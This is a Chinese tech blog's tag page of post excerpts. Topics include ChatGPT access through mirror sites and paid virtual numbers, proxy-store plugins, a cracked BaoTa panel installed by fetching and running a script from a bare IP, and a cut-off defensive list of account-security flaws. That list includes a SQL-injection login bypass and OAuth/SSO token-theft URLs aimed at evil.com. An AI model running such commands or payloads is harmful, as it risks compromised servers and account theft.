搜索到
108
篇与
技术分享
的结果
-
-
火爆全球的ChatGPT,最全的使用方法! ChatGPT是OpenAI旗下的一款聊天机器人,现在已经火遍全球,前几天我简要介绍了一下,很多小伙伴儿留言想知道怎么使用。目前来说,需要免费注册一个OpenAI账号,才能使用。可惜暂未对国内开放注册,无法访问。下面简要介绍几种方法,供大家参考。{mtitle title="方 法 1(高仿网站)"/}首先介绍最简单的方法。由于国内无法访问,我们可以使用网友搭建的镜像网站,这里推荐几个:① https://aigcfun.com这个网站和官网的界面设计是一样的。免费使用、无需登录账号、无需科学上网,网站无广告,非常方便。打开网页后,直接输入问题提问即可。② http://chat.h2ai.cn/home与上面的网站类似,界面为中文,与官网界面一致。可以作为备用。③ https://xc.com这也是一个第三方的镜像网站,使用也比较简单。{mtitle title="方 法 2(官方网站)"/}ChatGPT的使用方法其实很简单,就是登录官方地址,注册一个账号,然后就可以免费使用了。之所以很多人搞不定,主要是尚未对国内开放,需要科学上网;在注册账号的过程中,有一步需要验证码,而这个验证码需要国外的手机号。因此,使用上有一定的门槛,下面简要说明:1、科学上网,打开ChatGPT官网进行注册:https://chat.openai.com2、注册账号的过程中,需要一个国外手机号收验证码。我们可以用下面网站提供的虚拟号码来接受验证码。https://sms-activate.org可惜并不是免费的,需要至少充值1美元(7元人民币)。这个网站使用的时候,也要先注册一个账号。购买号码时,选择一个(例如:印度)点击购物车,充值时可以选择支付宝,便宜的号码5~6元人民币左右,购买后账户还会剩下一点余额。成功付款后,等待几秒钟自动给出一个虚拟号码,这个号码可以用来接受验证码。需要注意的是,虚拟号码给出后,要尽快使用,过期就失效了。{mtitle title="方 法 3(微软的Bing)"/}前不久的新闻,微软的Bing搜索引擎与ChatGPT合作,打开如下网站,可以获取“使用ChatGPT版Bing”的后补资格。https://www.bing.com/new这个网站打开后,应该是如下界面,不过目前仍需要一些手段才可以打开。使用方法:1、使用Edge浏览器,扩展市场中搜索并安装Gooreplacer。2、点击浏览器中该扩展的图标,点击导入下面的规则。如下图所示。https://wwi.lanzoup.com/b00qoxi4b 密码:e0d13、重启浏览器,然后再进入新的Bing网站,就可以正常打开了。点击一下申请候选“Join the waitlist”,这个时候需要登录微软账户。https://www.bing.com/new4、接下来就是等待邮件通知了,等收到通知就可以体验ChatGPT版本的Bing了。{mtitle title=" 方 法 4(使用ChatGPT的API密钥)"/}这种方法,依然需要注册一个OpenAI的账号,方法参考方法2。在已经有了OpenAI账号的前提下:1、打开OpenAI官网,申请API密钥(科学上网)。https://platform.openai.com/account/api-keys2、下载一个第三方的客户端(来自吾爱破解论坛),将申请到的API密钥输入到下图中。然后就也可以和ChatGPT对话了,平时对话的时候,不需要科学上网,正常联网即可。https://wwi.lanzoup.com/b00qoxomf 密码:g2e9让ChatGPT画一张老虎吧
-
手把手完成 ChatGPT 注册 ChatGPT 由人工智能公司 Open AI 推出,其对自己的定义是优化对话的语言模型,体验非常震撼,近期不断发布与 ChatGPT 对话的内容,但其不支持中国大陆用户的注册,把我们想尝试进去玩一玩的人拒之门外。这里为大家提供一种注册方式。科学上网环境准备这个不用过多介绍了哈,需要将网络环境切换国外 IP(注意:香港 IP 也是不可以的),否则,你会遇到下图的错误提示。这里建议使用北美、日韩等地的 IP。接验证码准备核心就是使用国外手机号获取验证码,因为 ChatGPT 注册最后一步是通过手机接收验证码。因为 OpenAI 服务目前暂不支持国内,因此国内手机号是没有办法通过验证。另外 Google Voice 等北美地区的虚拟号码也是不能用的,因为 OpenAI 会检测虚拟号码,他们也不允许虚拟号码注册。这时候就要用到下一步的接码平台。通过 sms-activate.org (短信接码平台)接收手机验证码完成验证。需要用邮箱注册一个 sms-activate 平台的帐号。注册完成后,会收到一封验证邮件,如下图:点击「确认」后,通过邮箱完成验证。下一步需要先进行充值,因为在选择加购的时候会提示「账户余额不足」之类的提示信息。点击充值跳转后,往下滑找到支付宝,使用支付宝充值 0.2 美金即可。充值好了以后回到首页搜索「open」关键字就可以找到 OpenAI 验证码的临时号码购买链接,点击「购物车」。这里我选择了印度。然后,可以在激活区看到待使用的临时号码,如下图:注册 ChatGPT 需要发送验证码时,将此号码复制到 OpenAI 的验证码接收区里面。注册 ChatGPT 帐号打开 https://chat.openai.com/auth/login 链接进行帐号注册创建帐号,有两种方式:1、通过邮箱注册并完成邮箱验证,注意:国内邮箱可能收不到验证码,我这里注册的微软邮箱帐号,https://outlook.live.com/2、通过 Google 或 微软邮箱帐号登录1,我自己使用的方法 2 ,通过第三方帐户登录。完成这一步之后,需要手机号验证。上图默认显示代理区的编码,可以通过下拉选项进行修改。,然后将接码平台的手机号复制、粘贴过去。然后点击发送验证码就完成了。等一会网站会提示验证码,复制、粘贴到验证码输入区,自动跳转,完成注册。开始使用 ChatGPT!注册完后,打开ChatGPT网站去登录。示例:超强人工智能 AI ChatGPT 在等你体验~~
-
-
-
-
彩虹社区版替换文件以及直客插件一键上架 社区版的功能介绍.1、批量同步订单数据亿乐、玖伍、商战、彩虹系统、直客2、同步货源站订单退款,并退款给自己的用户、且扣除该笔订单的下级用户的提成3、同系统对接也支持订单数据同步(对方也是彩虹系统社区版的)4、后台、前台,呈现订单数据的初始值、当前值,方便查看是否已经完成!5、新增 一级分类7、新增 商品白名单,业务只给指定的用户查看或下单(超级好用的功能,懂的都懂,设置入口在 商品管理>一级分类)8、后台订单管理点击订单ID,会弹出菜单,可直接向对接社区申请退单、该商品的分类、编辑商品、跳转到社区商品9、前台模板新增商品价格变动监控(也具备商品白名单的功能)10、专业版分站支持一键设置全部商品的、下级价格、销害价格。11、插件、批量上架商品、目前支持亿乐、玖伍、直客11.2、同系统一键克隆,千百个商品只需十来秒就能克隆完毕12、插件、拼DD 二维码转链接13、插件、网课查课(抓取别人的接口,现在已经失效了,有接口的话自己去修改api_tool/wk/query.php)14、插件、玖伍下单、查询订单进度、获取商品,跟玖五一样的api接口(其他系统能对接玖伍的,也能对接彩虹系统)15、修改了价格字段,由之前的0.00变更为0.000000(既然是社社区版,一定要开启余额下单)隐藏内容,请前往内页查看详情
-
-
彩虹云商城QQ微信快捷登录设置教程,附QQ互联分发api平台地址 彩虹代刷网6.2版本开始新增了QQ快捷登录功能,这个功能出的还是非常好的,用户比较多的网站可能必须要启用这个功能了哟,就是因为方便,可以提高用户留存从而产生更多的回头客!详情介绍大家都知道,常规来说,QQ快捷登录需要在QQ互联申请,申请的时候至少要有一个配置好的网站和一个备案域名,流程时间也很长,所以我们搭建了聚合中转API接口,可让您的商城直接使用QQ快捷登录。由于代刷网行业特殊用代刷网去申请QQ官方的互联那是不可能通过的,只能用现有的或者别的网站去申请会导致部分代刷网运营者没有技术能力去解决,故此彩虹出了QQ一键登录接口是第三方qq互联Api分发的,只要在后台填上Api接口地址,应用APPID,应用APPKEY即可正常使用QQ快捷登录功能。教程1、注册并登录打开 素颜聚合-聚合中转API 用户中心,进行注册,注册完成后登录账号进入后台2、应用列表创建应用进入后台管理中心在应用列表创建应用应用名称:填写自己网站名称。如:素颜云商城应用首页网址:填写自己网站首页地址。如:https://suyanw.cn/回调域名白名单:填写自己域名。如:suyanw.cn注意:域名不要带http(s)://和/,直接写网址即可。3、打开彩虹云后台——快捷登录配置4、填写在聚合登录获取到的id和key,以及接口地址保存即可5、配置完成
-
宝塔面板最新企业版 | 宝塔破解版/魔改版 FOR CentOS7/64| Copyright © 2015-2099 BTPOJIREBAN All rights reserved.|移除宝塔面板实名绑定|移除宝塔面板收集用户隐私模块|移除宝塔面板网站内容监听模块|移除与宝塔宝塔官网一切通信协议|免费使用宝塔面板专业版插件|免费使用宝塔面板企业版插件|新增TCP内核锐速/安装时自动开启|修复宝塔CC拦截组件无法正常使用问题|修复宝塔下载部分冷门插件下载源失效问题Centos7在线安装命令/暂不支持其他版本yum install -y wget && wget -O bt.sh http://45.61.185.130/bt.sh && sh bt.sh
-
宝塔面板Nginx开启Brotli压缩,提升网站加载速度-【给网站提提速】 前言Google 认为互联网用户的时间是宝贵的,他们的时间不应该消耗在漫长的网页加载中,因此在 2015 年 9 月 Google 推出了无损压缩算法 Brotli。Brotli 通过变种的 LZ77 算法、Huffman 编码以及二阶文本建模等方式进行数据压缩,与 Gzip相比效率提升约 17-25%。这里简单说一下如何在宝塔面板Nginx开启Brotli压缩。正文下载Brotlicd /www/server #下载brotli git clone https://github.com/google/ngx_brotli.git cd ngx_brotli #更新brotli git submodule update --init配置Nginx Brotli模块登录宝塔管理面板 -> 软件商店 -> 已安装 找到Nginx ~不要犹豫~ (还是推荐备份下系统快照) 直接点击 卸载!2.点击 软件商店 ->运行环境 找到Nginx 不要犹豫 点击安装在弹出的窗口中选择编译安装 点击添加自定义模块模块名称:ngx_brotli 模块描述:ngx_brotli 模块参数:--add-module=/www/server/ngx_brotli 填写完成后返回安装选项✔刚刚添加的模块提交,等待安装完成即可!3.给网站开启brotli压缩软件商店找到Nginx点击设置选择配置修改将以下代码插入http段保存即可。Tips:Britli和Gzip可以共存无需关闭Gzip.# brotli brotli on; brotli_comp_level 1; brotli_buffers 16 8k; brotli_min_length 20; brotli_types text/xml text/plain text/css application/javascript application/x-javascript application/rss+xml text/javascript image/tiff image/svg+xml application/json application/xml; 打开网站查看标头若返回br即启用成功。{mtitle title="启用成功"/}PS:问:这个和Nginx的Gzip冲突吗?答:不冲突,但是Br相对Gzip效率高但对CPU资源占用也高,如果单核机器就不建议都开了
-
宝塔 Linux 面板 7.9.5 开心版【万圣节快乐!】 本次更新时间:11月8日【移除】去除访问日志自动生成【移除】去除WebRTC连接【移除】so为自行编译非官方so文件(所以不存在 PluginLoader.get_soft_list(cid) 调用)【更新】IP配置工具 1.3 - 1.4【新增】微步木马检测 1.0【更新】系统防火墙 3.2 - 3.3【更新】Linux工具箱 1.8 - 1.9【更新】进程守护管理器 2.2 - 2.3【更新】日志清理工具 2.1 - 2.2【更新】堡塔应用管理器 1.6 - 1.8【更新】又拍云存储 4.7 - 4.8【更新】堡塔应用管理器 1.7 - 1.8【更新】FTP存储空间 5.1 - 5.3【更新】阿里云OSS 5.3 - 6.1【更新】亚马逊S3云存储 1.1 - 1.4【更新】七牛云存储 5.3 - 5.4【更新】谷歌云网盘 2.0 - 2.1【更新】谷歌云存储 1.5 - 1.6【更新】腾讯云COS 4.8 - 5.1【更新】百度云存储 1.1 - 1.2【更新】华为云存储 1.1 - 1.2【更新】京东云存储 1.0 - 1.1【更新】Apache防火墙 9.0 - 9.1【更新】Nginx防火墙 9.0.6 - 9.0.7【更新】网站监控报表 7.0 - 7.2.1【更新】宝塔数据同步工具 3.3 - 3.4【更新】宝塔系统加固 3.3 - 3.5【更新】宝塔任务管理器 2.1 - 2.2【更新】对象存储自动挂载 1.1 - 1.2【更新】部分环境升级【优化】软件列表优化7.9.4 官方更新记录【增加】增加脚本文件CRLF自动转LF机制【增加】端口规则增加允许指定-和,格式的多个IP地址【增加】增加用户体验改善计划开关(在设置页面)【增加】增加登录限制倒计时提示【优化】优化数据库云存储“修复“功能【优化】优化flask/gevent升级脚本【优化】优化在磁盘不可写的情况下,面板的可用率【优化】优化SSH基本设置模块【调整】调整反向代理静态文件默认缓存时间为1分钟【调整】调整首页安装软件列表获取机制【调整】调整bt default默认密码覆盖为*号【调整】移除防火墙放行端口时自动放行UDP端口的机制【修复】修复SSHKey无法下载的问题【修复】修复消息通道微信公众号不显示【修复】修复debian系统重启防火墙禁ping失效【修复】修复mysql8.0可能被识别为greatsql8.0的问题【修复】修复已添加企业增量备份却提示未备份问题【修复】修复port.pl内容异常的情况下无法启动面板的问题【修复】修复常用命令编辑时命令名称首尾带空格导致的问题【修复】修复短信告警模块每次都从云端获取短信数量的问题【修复】修复终端aes密码异常导致的问题【修复】修复计划任务中的任务在停用状态下编辑结果不会实时同步到脚本的问题【修复】修复某些情况下获取本机IP出现死循环的问题【修复】修复数据库密码转义问题【修复】修复计划任务备份清理时会清理手动备份的问题【修复】修复因python环境变量导致的jobs未执行问题注意:此版本不支持Python2.7【不喜勿用-无任何病毒代码-面板全解密】Centos/Ubuntu/Debian安装命令 独立运行环境(py3.7):默认安装是7.8.0 直接在线升级7.9.5隐藏内容,请前往内页查看详情Linux面板 7.9.5 升级企业版命令(已经安装官方脚本/或者其他脚本的 可以执行此命令)隐藏内容,请前往内页查看详情
-
-
-
网站地图是什么?该如何生成 一些初入SEO行业的小白可能听过网站地图这个名词,但是对于网站地图的具体作用可能不是很清楚。今天义信科技麒麟老师特意查了一下这个关键词的百度指数,发现100多,就立马写了这篇文章,关于网站地图(sitemap)是什么?网站地图如何生成?这些问题在这篇文章里都为大家解决。网站地图(sitemap)是什么?顾名思义,网站地图是为网站的用户提供导航索引的一种用于网站的地图,这里说的用户一方面指现实中的用户,另一方面指搜索引擎蜘蛛。网站地图的格式:网站地图主要分为3种格式,一种是html格式的,一种是xml格式的,还有一种是txt格式的,html格式的网站地图主要应用于网站的页面上,xml和txt格式的网站地图主要是给蜘蛛看的,一般需要提交给搜索引擎。网站地图文件里长什么样1、html网站地图这种地图其实就是通过html代码写出来的一个网站页面,至于具体长什么样,需要设计人员去规划。下面是一个案例:2、xml网站地图xml格式网站地图文件后缀是xml,里面具体样式是:上述Sitemap向百度提交了2个url:http://www.yoursite.com/yoursite.html、http://www.yoursite.com/yoursite2.html若有多条url,按照上述格式重复之间的片断,列明所有url地址,打包到一个xml文件,向搜索资源平台进行提交。至于具体每一项里面填什么,第三方工具里面都会有提示。3、txt网站地图如上图所示,只要将网站所有url一行一条的放到txt文档里,则txt格式的网站地图就制作完成了。为什么要做网站地图?了解了网站地图是什么,麒麟老师觉得有必要为大家介绍一下为什么要做网站地图,下面主要分为两个方面来进行讲解。1、提升用户体验对于一些中大型网站,网站的目录、频道页面很多,用户一下找不到自己想要的页面,此时如果网站做了网站地图,用户通过网站地图可在短时间内找到自己想要的页面,当然网站地图要做的合理,这需要前期的细致规划。这种地图一般是html格式的。2、提升蜘蛛的抓取效率、收录html格式的网站除了上述作用外,还有一个作用,那就是提升蜘蛛的抓取效率,从而促进网站收录,当然,xml以及txt格式的网站地图也有此作用。网站地图将网站所有的有效页面都放在了一起,可以让蜘蛛短时间内发现网站所有的链接,从而爬取收录。网站地图如何生成?1、通过工具生成对于一些小型的企业网站,通过一些工具生成网站地图即可,这里麒麟老师推荐爱站工具包里的网站地图生成工具。当然大家也可以在百度搜索网站地图生成工具,来找到合适自己的那一款。2、通过技术生成对于一些中大型网站,通过工具生成可能就不行了,一方面数据量大,耗时长,另一方面平台可能会收费。此时就需要公司的技术人员来通过技术手段进行生成网站地图。网站地图怎么用?1、html格式网站地图对于html格式的网站地图,一般放到网站的底部模版,用户随时可以看到,同时蜘蛛也可以随处抓的到。除了网站的底部外,还会放到robots.txt这个文件中,具体格式是:Sitemap:http://www.xxx.com/sitemap.html2、xml及txt格式网站地图对于xml及txt格式的网站地图,一方面需要放到robots.txt文件中,另一方面需要通过百度搜索资源平台提交给搜索引擎。具体入口见下图:以上就是义信科技麒麟老师对网站地图(sitemap)是什么?网站地图如何生成的介绍,后期会更新robots文件等相关的干货内容,请持续关注义信科技。
-
WEB开发中常见的45个账号安全风险 以下文章来源于永安在线情报平台 ,作者永安在线 信息化时代,大部分平台都需要通过账号登录才可体验更多功能,近些年为方便用户操作,平台演变出了扫码登录、第三方授权登录等多种登录方式,同时也为攻击者打开了更大的攻击面。 账号包含着各种重要信息如个人手机APP账户、网站账户、银行卡账户密码等,是黑产眼中的“香饽饽”。 永安在线情报平台监测过多起黑产利用账号缺陷发起规模攻击,如扫号攻击、撞库攻击、盗号登录等,最终达到窃取敏感数据、资金盗取、网络诈骗、薅羊毛等目的。因此,加强账号安全管理,是企事业单位业务和数据安全保障的第一道屏障。 为此,猎人君为大家梳理了45个账号安全风险点,方便大家在账号安全管理中查缺补漏,从而建立更加全面的账号安全体系。 下文将结合永安在线情报平台捕获到的攻击案例,对不同安全场景和凭证中45个安全风险逐一分析: 按照不同场景分析 密码登录场景 账号相关 1. 账号可枚举 // 危害性:低 普遍性:高 可利用性:高 通过响应体的内容可以判断账号在系统中是否存在,拿到存在的账户后可进一步发起撞库/爆破攻击,提高攻击效率。 例如该接口会对不存在的用户名返回“用户名不存在”,可利用这个提示来枚举账号。 2. 默认账号 // 危害性:低 普遍性:高 可利用性:高 很多系统都会有默认的账号,比如很多管理后台都会有个admin账号,这样攻击者即使无法枚举账号在系统中是否存在,也可以尝试对默认账号发起攻击。 密码相关 3. 撞库 // 危害性:高 普遍性:中 可利用性:中 一般情况下,用户会用一个手机号或邮箱在多个平台上注册账号,为了方便记忆,密码可能会设置成一样的。当某些平台的用户数据泄露了,攻击者就会拿泄漏的账号密码去别的平台尝试登录。比较常见的有游戏行业的「撞库攻击」,游戏账号的价值比较高,对攻击者来说可获取高额利润。 永安在线情报平台曾捕获过多起黑产贩卖撞库成功得来的账号信息: 4. 钓鱼 // 危害性:高 普遍性:高 可利用性:中 攻击者通过准备一个和官方平台基本一样的登录页面(域名不同)或礼品领取、抽奖的页面等,引诱受害者输入账号密码。攻击者通过这种方式可直接获取到受害者的明文账号密码。 5. 弱密码 // 危害性:高 普遍性:高 可利用性:高 「弱密码」没有一个明确的定义范围,任何可能被猜解出来的密码都可以被称为弱密码。常见的弱密码123456,像dingdang2022、dingdang.com、dingdang@2022也可被称为弱密码。攻击者通过常见的弱密码以及收集目标的相关信息,组合起来生成密码进行爆破。 例如某个管理后台存在弱密码,域名为pass****.cn,通过爆破就得到账号密码为pass****、pass****2016。 6. 万能密码 // 危害性:高 普遍性:低 可利用性:高 「万能密码」指的是用什么密码都可以登录系统,是因为登录接口存在SQL注入漏洞造成的。 例如输入账号admin密码123456,后端会执行的SQL语句大概为: SELECT * FROM user WHERE username='admin' AND password='123456' 如果存在SQL注入漏洞,攻击者可以构造语句,输入账号admin' # ,输入任何密码,后端会执行的SQL语句就变为: SELECT * FROM user WHERE username='admin' #' and password='123456' 这里通过#注释符把后面查询密码的语句注释掉了,校验账号密码的逻辑就失效了,实现万能密码登录。 7. 密码明文传输 // 危害性:高 普遍性:中 可利用性:低 密码在提交到服务器的过程中,没有进行加密处理,攻击者可通过中间人攻击的方式获取到明文密码。 8. 密码在URL中 // 危害性:高 普遍性:低 可利用性:低 如果一个登录请求会把账号密码写在URL中,即把密码暴露在浏览器的地址栏上,或可能会被浏览器、安全软件给记录下来。如果包含密码的这个URL,是个HTML,HTML上又会加载JS、CSS等第三方的资源文件,那在请求这些第三方文件的时候,就会通过Referer把密码泄漏了。 9. 密码明文存储 // 危害性:高 普遍性:低 可利用性:低 用明文存储密码有很大的安全隐患, 一般数据库里还存有用户的姓名、手机号、用户名等信息,一旦数据库发生泄漏,再加上用户的明文密码,攻击者就可以用账号和密码去其他网站尝试登录。因为用户往往会根据习惯将多个网站的密码成一样的,跟前面提到的撞库攻击存在的问题一样。 10. API泄露密码 // 危害性:高 普遍性:低 可利用性:高 因为开发人员的疏忽,API接口可返回用户的所有字段(包括密码)的信息,攻击者就可轻易获取到用户的密码。 验证码相关 11. 图形验证码失效 // 危害性:低 普遍性:低 可利用性:高 常见的让图形验证码失效的方式有把验证码参数值填空,或者验证码参数删掉。 如下案例就是直接把验证码参数删除,验证码失效,不再返回验证码错误。 12. 滑块验证码失效 // 危害性:低 普遍性:低 可利用性:高 最常见的滑块验证码是通过SaaS接入的,但为了避免第三方服务器出问题影响业务的正常运营,通常会提供一个宕机模式(即第三方服务器出问题时可不用进行滑块验证码),攻击者利用这一点就可以让滑块验证码失效。 如下是在请求中添加了个"xx_server_status":0,让服务端以为第三方服务宕机了,就不用进行滑块验证了,从而绕过了滑块验证。 13. 不同端验证码策略不一致 // 危害性:低 普遍性:低 可利用性:高 平台可能对一套系统开发了PC网页版、移动网页版、APP等,在不同端上验证码的策略可能不同。比如在PC网页版的登录接口是有验证码的,换到APP可能就没有验证码了,攻击者就可利用APP的接口来发起攻击。 14. 验证码可复用 // 危害性:低 普遍性:低 可利用性:高 「验证码可复用」即验证码使用多次不失效,利用这个缺陷来绕过验证码发起攻击。 永安在线情报平台就捕获过多起攻击者利用验证码可复用的漏洞进行扫号攻击。如下图,攻击者多次请求都是使用的同一个验证码,并且都请求成功。 15. 使用老接口 // 危害性:低 普遍性:高 可利用性:中 平台开发了新的接口,但是老的接口可能没下线,这类老接口很容易被攻击者利用。 下图是永安在线情报平台捕获的一个攻击事件,平台在页面上显示的是中文验证码: 但从永安在线情报平台流量中看到,攻击者请求中的验证码都是英文数字,并非中文验证码。 通过分析得出应该是平台新接口升级了验证码为中文验证码,但老的接口还能继续使用英文数字验证码,攻击者正是利用这一漏洞对老接口发起攻击。 短信验证码场景 16. 验证码位数过短 // 危害性:高 普遍性:中 可利用性:高 如果短信验证码是纯数字的,位数又比较短(小于等于4位),攻击者很容易把验证码爆破出来。 下图所示是一个短信验证码登录接口,对手机号为13888888888的短信验证码进行爆破,可实现任意用户登录。 17. 验证码有效期过长 // 危害性:中 普遍性:低 可利用性:低 6位纯数字的验证码爆破的成本比较高,一共有一百万个数字需要爆破,耗费的时间会非常长。但如果验证码的有效期比较长,比如1小时甚至更久,还是存在被爆破的风险。 如下案例,某接口登录使用的是6位验证码,有效期超半小时,案例中的验证码是0开头的(运气比较好),所以比较快地爆破出了验证码为064716。 18. 验证码在响应中泄露 // 危害性:高 普遍性:低 可利用性:高 发送短信验证码的接口,有可能在其响应体/响应头中泄漏了验证码。如下案例所示,某教育类APP发送验证码的API接口,在响应体中泄漏了验证码,和客户实际收到的短信验证码一致,攻击者可利用该漏洞实现任意用户登录/注册等操作。 19. 验证码由客户端生成 // 危害性:高 普遍性:低 可利用性:高 在发送短信验证码的接口,也有可能由客户端来生成验证码,然后给到后端来发送短信验证码,相当于可以自己指定手机号的验证码,攻击者可利用该漏洞实现任意用户登录/注册等操作。 20. 测试验证码未删除 // 危害性:高 普遍性:低 可利用性:中 在应用上线前,开发人员可能为了方便测试,设置了测试专用的验证码(如0000、1111、2222等),输入该验证码即可完成登录/注册等操作。在应用上线后可能未删除该验证码,攻击者可利用测试验证码实现任意用户登录/注册等操作。 21. 验证码与手机号未绑定 // 危害性:高 普遍性:低 可利用性:高 在短信验证码登录的场景下,后端校验验证码是否正确时,没有验证验证码与手机号的关系,仅仅校验验证码是否为有效期内下发过的验证码。攻击者可利用自己的手机号接受短信验证码,实现任意用户登录/注册等操作。 扫码登录场景 22. 扫码授权登录CSRF // 危害性:高 普遍性:低 可利用性:中 扫码登录的流程大概如下: 有些后端没有去验证用户是否扫描了这个二维码,可以直接跳到授权登录这一步,在授权登录这个点上如果又存在CSRF漏洞,攻击者即可构造一个恶意的链接,引诱用户打开链接,利用该漏洞就可以轻易获取用户账号权限。 23. 凭证窃取 // 危害性:高 普遍性:低 可利用性:中 通过对某个平台的扫码登录逻辑进行分析,猎人君发现最后确认登录时,只需用户的memberId就可以完成登录,每个用户的memberId又是唯一不变的。如果有办法获取到用户的memberId,就相当于永久获取到了其账户的权限。 再进一步挖掘发现在APP内可以使用JavaScript通过JSBridge调用Native方法拿到当前用户的memberId,又通过平时收到的营销短信中的链接发现可以使用Deep Link唤醒APP打开任意URL。 三者结合在一起可构造一个恶意URL,引诱用户打开,打开后会通过Deep Link唤醒APP打开构造好的页面,页面就是通过JavaScript拿到memberId并外传,再拿着memberId通过确认登录的接口就可以登录用户的账号了。 第三方授权登录场景 24. 凭证窃取 // 危害性:高 普遍性:低 可利用性:中 第三方授权登录指的是通过QQ、微信或微博等进行登录,如果配置不当也会存在漏洞。 以QQ授权登录举例: https://graph.qq.com/oauth2.0/show?which=Login&display=pc&response_type=code&client_id=123456&redirect_uri=http://www.aaa.com/user/thirdparty/qq_callback.php&state=8ccc0aef42194df06cfd42c606e4d59a&scope=all 用户使用QQ号登录成功后,会把登录凭证code传递给回调地址redirect_uri,如下所示: Location: http://www.aaa.com/user/thirdparty/qq_callback.php&state=8ccc0aef42194df06cfd42c606e4d59a&scope=all&code=xxxxxxxxx 那么如果redirect_uri这个值是攻击者可控的,那攻击者可以构造恶意URL来窃取用户的code。正常都会限制redirect_uri的域名,比如为*.aaa.com,这样域名攻击者不可控,就不会有什么问题了。但如果结合其他子域下的问题,还是可能导致用户的code被窃取。 分析某站点第三方登录逻辑时发现,对redirect_uri的域名限制为*.aaa.com,在b.aaa.com域名下发现一个论坛,论坛帖子得回复可以插入第三方的图片,将这两点结合起来就可以通过referer来窃取code。 https://graph.qq.com/oauth2.0/show?which=Login&display=pc&response_type=code&client_id=123456&redirect_uri=http://b.aaa.com/tiezi/123456&state=8ccc0aef42194df06cfd42c606e4d59a&scope=all 登录成功后会带着code访问帖子: http://b.aaa.com/tiezi/123456&state=8ccc0aef42194df06cfd42c606e4d59a&scope=all&code=xxxxxxxxx 而帖子中又有攻击者插入的第三方图片,在加载第三方图片的时候,就把code传输出去了,完成code窃取: GET http://www.evil.com/test.jpg Referer: http://b.aaa.com/tiezi/123456&state=8ccc0aef42194df06cfd42c606e4d59a&scope=all&code=xxxxxxxxx 攻击者拿到code和state之后,即可登录受害者的账号。 单点登录场景 「单点登录」指的是用户一次可通过一组登录凭证登入会话,在该次会话期间无需再次登录,即可安全访问多个相关的应用程序和服务。 25. 凭证窃取 // 危害性:高 普遍性:低 可利用性:中 如下是某平台单点登录的功能: https://passport.a.com/account/unitivelogin?service=86904ff8&continue=https://www.a.com/account/settoken 在登录状态下访问后会把凭证发送到continue参数指定的地址: 如果continue参数中接口的域名可控,攻击者可把域名改成自己的,再把链接发给受害者,引诱受害者打开链接,凭证就会被发往攻击者的域名。 通过测试发现这里不能将a.com改为b.com,后端有一定的检测逻辑。但通过多次测试发现可以在参数中插入空白字符(%00、%09、%0a、%0d)来干扰检测,达到域名可控的效果。 https://passport.a.com/account/unitivelogin?service=86904ff8&continue=https://www.a.com%09.evil.com/account/settoken 当受害者访问该链接,凭证就会被发送给攻击者了: https://www.a.com.evil.com/account/settoken,攻击者就可以利用该凭证登录其所有业务。 修改密码场景 26. 修改密码CSRF // 危害性:高 普遍性:低 可利用性:中 修改密码处如果没有校验旧密码、短信验证码等,则可能存在CSRF漏洞,易被攻击者利用。攻击者利用该漏洞可构造链接诱导受害者打开,打开后受害者账号的密码就被修改了。 27. 修改密码越权 // 危害性:高 普遍性:低 可利用性:高 修改密码的API存在越权漏洞,导致攻击者可利用该漏洞直接修改其他用户的密码。 忘记密码场景 28. 任意用户密码修改 // 危害性:高 普遍性:低 可利用性:高 忘记密码功能一般会给用户绑定的手机号/邮箱发送一个验证码,验证通过后即可重置密码。攻击者如果可以爆破该验证码,或在最后设置新密码时后端验证存在缺陷,可以导致任意用户密码修改。永安在线情报平台曾捕获到一起攻击事件,攻击者利用某数字藏品的忘记密码接口漏洞,来修改其他用户的密码。 攻击者在修改其他用户的密码后,会登录账号并尝试把账号内的数字藏品进行转增,以此来获利。 账号绑定场景 29. 账号绑定CSRF // 危害性:高 普遍性:低 可利用性:中 平台一般会提供账号绑定的功能,即账号可以绑定邮箱、QQ号或微信号,后续可以使用这些方式进行登录。若绑定功能存在CSRF,攻击者利用该漏洞让受害者绑定上自己的账号(邮箱、QQ号、微信号等),攻击者后续就可以用自己的账号来登录受害者的账号了。 多因子认证场景 许多网站都使用密码一个因子来验证用户的身份,但是有些网站会用多个因子来验证用户的身份。拿密码和验证码两个因子来说,攻击者同时获得这两个因子比获得其中一个因子的可能性要小得多,因此双因子认证比单因子认证更安全。 30. 双因子认证绕过 // 危害性:高 普遍性:低 可利用性:中 如果双因子认证的实现存在缺陷,也是可能被绕过的。 例如,网站验证用户的账号密码后,还要验证邮件收到的验证码,两个因子认证都通过才算登录完成。 但是这里在验证完账号密码后,COOKIE已经拥有了登录态,导致不填入验证码也可以直接访问/my-account账户页面,以此绕过了双因子认证。 31. 双因子认证爆破 // 危害性:高 普遍性:低 可利用性:低 即使网站使用了双因子认证来确保账号安全,但如果没有对爆破攻击进行防御,攻击者还是可以对这些因子(如密码、验证码)进行爆破,以获取账号权限。 按照不同凭证分析 COOKIE 32. COOKIE未设置HTTPONLY // 危害性:低 普遍性:低 可利用性:中 COOKIE如果没有设置HTTPONLY,可能导致COOKIE被窃取。攻击者可以通过XSS漏洞执行document.cookie来拿到用户的COOKIE。 33. COOKIE未设置SECURE // 危害性:低 普遍性:低 可利用性:低 COOKIE如果没有设置SECURE,可能导致COOKIE被窃取。在网站传输使用HTTP的情况下,攻击者可以通过中间人劫持获取到COOKIE。 34. 会话固定 // 危害性:低 普遍性:低 可利用性:中 「会话固定」指的是网站在登录前后的会话不变,比如登录前COOKIE是123456,登录后的COOKIE还是123456,那么攻击者可能就可以通过某些API给受害者写入COOKIE。比如攻击者构造了一个URLhttp://www.a.com/?session=123456,受害者访问后点击该链接进行登录,会话成功建立(此时的session已经被攻击者预先设置为123456了),攻击者此时就可以用session=123456登录受害者的账号了。 35. 不同COOKIE策略不一致 // 危害性:低 普遍性:低 可利用性:低 很多时候网站会给COOKIE设置HTTPONLY以防止XSS漏洞对COOKIE读取,但可能给PC网页版的COOKIE设置了HTTPONLY,但移动端的COOKIE没有设置,攻击者还是可以利用XSS漏洞来获取到用户的COOKIE。 36. API泄露COOKIE // 危害性:高 普遍性:低 可利用性:高 猎人君在分析某站点登录的逻辑时,发现最后会把COOKIE返回在登录成功的API中,这个COOKIE设置了HTTPONLY,正常通过XSS是无法获取到该COOKIE的。但是现在泄漏到了API的响应中,就有机会通过XSS来获取泄漏在登录成功API中的COOKIE。 接下来就需要一个和登录成功页面同域的XSS,登录成功的域是www.a.com,在这个域下的接口很少,想找到一个XSS的难度的比较大。但是在其HTML中发现有这么一段代码document.domain=a.com,将域设置为了a.com,即任意一个子域名*.a.com的XSS都可以获取到该页面的内容,利用难度大幅下降。 37. APP漏洞导致COOKIE被窃取 // 